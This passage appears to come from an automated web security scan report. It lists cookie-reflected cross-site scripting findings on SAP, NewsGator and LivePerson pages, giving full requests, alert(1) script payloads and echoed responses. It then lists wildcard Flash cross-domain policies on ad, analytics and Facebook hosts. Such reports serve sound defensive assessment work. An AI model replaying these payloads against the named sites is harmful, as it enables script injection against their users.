Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; mbox=session#1318688512533-813903#1318690473|check#true#1318688673; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP_SCORING_COOKIE=SOLUTION=BARB002004,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:26:31 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:26:31 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.google.com%2fsearch%3fhl%3den%26q%3d37f8e%252522%25253e%25253cscript%25253ealert%2525281%252529%25253c%25252fscript%25253ed84849f1e63; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:26:31 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:26:31 GMT
Content-Length: 87686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script language
...[SNIP]...
<a href="/search?hl=en&q=37f8e"><script>alert(1)</script>d84849f1e63" onmouseover="window.status='Cancel';return true;" onmouseout="window.status='';return true;">
...[SNIP]...
3.137. http://info.newsgator.com/Trial_SocialSites2010.html [_mkto_trk cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://info.newsgator.com
Path:   /Trial_SocialSites2010.html

Issue detail

The value of the _mkto_trk cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c85bc"><script>alert(1)</script>8f8092d2a75 was submitted in the _mkto_trk cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Trial_SocialSites2010.html?Leadsource=trial HTTP/1.1
Host: info.newsgator.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newsgator.com/Default.aspx?tabid=214
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028c85bc"><script>alert(1)</script>8f8092d2a75; __utma=1.930474175.1318692366.1318692366.1318692366.1; __utmb=1.2.10.1318692366; __utmc=1; __utmz=1.1318692366.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 200 OK
Date: Sat, 15 Oct 2011 15:29:19 GMT
Server: Apache
Vary: *,Accept-Encoding
Content-Length: 58979
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-200000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" la
...[SNIP]...
<input type="hidden" name="_mkt_trk" value="id:728-OGX-548&token:_mch-newsgator.com-1318692366404-89028c85bc"><script>alert(1)</script>8f8092d2a75" />
...[SNIP]...
3.138. http://sales.liveperson.net/hc/37021986/ [HumanClickKEY cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /hc/37021986/

Issue detail

The value of the HumanClickKEY cookie is copied into the HTML document as plain text between tags. The payload 322fe<script>alert(1)</script>66c84936f43 was submitted in the HumanClickKEY cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /hc/37021986/?&site=37021986&cmd=mTagKnockPage&lpCallId=829444102476-367235385580&protV=20&lpjson=1&id=3194230441&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-sap-sapphire-us-en-1%7ClpMTagConfig.db1%7ClpChatButtonDiv1%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; HumanClickSiteContainerID_37021986=STANDALONE; LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDSABCBTCA=JPCIGIDCLHAIHDGJNIENHOAB

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:26:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; path=/hc/37021986
Set-Cookie: HumanClickKEY=3723022180028337440322fe<script>alert(1)</script>66c84936f43; path=/hc/37021986
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Sat, 15 Oct 2011 14:26:49 GMT
Set-Cookie: HumanClickSiteContainerID_37021986=STANDALONE; path=/hc/37021986
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31949

lpConnLib.Process({"ResultSet": {"lpCallId":"829444102476-367235385580","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...
{"code_id": "FPCookie", "js_code": "lpMTagConfig.FPC_VID_NAME='37021986-VID'; lpMTagConfig.FPC_VID='546022977410'; lpMTagConfig.FPC_SKEY_NAME='37021986-SKEY'; lpMTagConfig.FPC_SKEY='3723022180028337440322fe<script>alert(1)</script>66c84936f43';lpMTagConfig.FPC_CONT_NAME='HumanClickSiteContainerID_37021986'; lpMTagConfig.FPC_CONT='STANDALONE'"},{"code_id": "SYSTEM!firstpartycookies_compact.js", "js_code": "function lpFirstPartyCookieSupport
...[SNIP]...
3.139. https://www.sap.com/host.epx [pmelayerurl cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sap.com
Path:   /host.epx

Issue detail

The value of the pmelayerurl cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49b75"%3balert(1)//cd3cd8afedf was submitted in the pmelayerurl cookie. This input was echoed as 49b75";alert(1)//cd3cd8afedf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /host.epx?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapbusinessoptimizer.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; a1slocale=en; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ascn%253Aadvancedsearch%7C1318691731633%3B%20pe%3Dno%2520value%7C1318691731640%3B%20c3%3Dno%2520value%7C1318691731645%3B%20s_nr%3D1318689931653-New%7C1321281931653%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448293531656%3B%20s_visit%3D1%7C1318691731658%3B%20gpv_p47%3Dno%2520value%7C1318691731661%3B; 37021986-VID=5110247826455; nwt=wetnow; ARPT=ONKKMMS169.145.6.59CKMMW; session=144fe053-5592-4145-8a61-c484bd4d3e8b; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; SAP.SITE.COOKIE=cmpgn.code=CRM-US10-SGE-FRBUSOPT&cmpn=CRM-US10-SGE-FRBUSOPT; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; OriginatingURL=http://www.sapbusinessoptimizer.com/; SingleSignOnURL=51a3d747-8c02-417d-8f96-ae6e0ddd405d||||http://www.sapbusinessoptimizer.com/|; pmeoriginalurl=%2fhost.epx; pmereturnurl=%2fgwtservice.epx; pmelayerurl=%2fprofile%2flogin.epx%3fCCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220%26pmelayer%3dtrue49b75"%3balert(1)//cd3cd8afedf; pmedialogmode=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:31:49 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 16:31:49 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapbusinessoptimizer.com%2f; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:31:49 GMT; path=/
Set-Cookie: pmelayerurl=; domain=.sap.com; path=/
Set-Cookie: pmedialogmode=; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:31:49 GMT
Content-Length: 32924


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...
ext/javascript">
$(document).ready(function()
{
openWindowLayer("/profile/login.epx?CCB945D0C99C211CE485301170A282A69A2B5D457FDCA8EAE05552155D0CA1E3EEFD315BAADABA281797FD8B20AF2220&pmelayer=true49b75";alert(1)//cd3cd8afedf");
}
);</script>
...[SNIP]...
4. Flash cross-domain policy  previous  next
There are 15 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 12:05:08 GMT
Expires: Sun, 16 Oct 2011 12:05:08 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 8387

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.2. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sat, 02-Oct-2021 13:47:02 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
4.3. http://leads.demandbase.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://leads.demandbase.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: leads.demandbase.com

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:19:09 GMT
Server: Apache
Last-Modified: Wed, 10 Aug 2011 06:02:39 GMT
ETag: "9064-c9-4aa206d767dc0"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...
4.4. http://omnituremarketing.d1.sc.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.d1.sc.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.d1.sc.omtrdc.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 13:47:21 GMT
Server: Omniture DC/2.0.0
xserver: www337
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
4.5. http://omnituremarketing.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omnituremarketing.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omnituremarketing.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:03 GMT
Accept-Ranges: bytes
ETag: W/"201-1315435999000"
Connection: close
Last-Modified: Wed, 07 Sep 2011 22:53:19 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...
4.6. http://omniturestaging.staging.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://omniturestaging.staging.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: omniturestaging.staging.tt.omtrdc.net

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Sat, 15 Oct 2011 13:47:09 GMT
Accept-Ranges: bytes
ETag: W/"201-1318276878000"
Connection: close
Last-Modified: Mon, 10 Oct 2011 20:01:18 GMT
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...
4.7. http://pixel.mathtag.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.mathtag.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.mathtag.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Connection: close
Content-Type: text/cross-domain-policy
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 pao-pixel-x3 pid 0xc91 3217
Connection: keep-alive
Content-Length: 215

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...
4.8. http://sap.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sap.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: sap.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Sat, 15 Oct 2011 14:24:58 GMT
Server: Omniture DC/2.0.0
xserver: www363
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
4.9. http://static.2mdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.2mdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sat, 15 Oct 2011 11:49:04 GMT
Expires: Sat, 15 Oct 2011 11:25:04 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 9351
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.10. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 15 Sep 2011 22:33:08 GMT
Date: Sat, 15 Oct 2011 07:13:32 GMT
Expires: Sun, 16 Oct 2011 07:13:32 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 25882
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
4.11. http://www.connect.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.33.29.104
Connection: close
Content-Length: 1590

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
   <allow-access-from domain="www.phunt.dev2439.facebook.com" />
...[SNIP]...
4.12. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.64.156.45
Connection: close
Content-Length: 1590

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
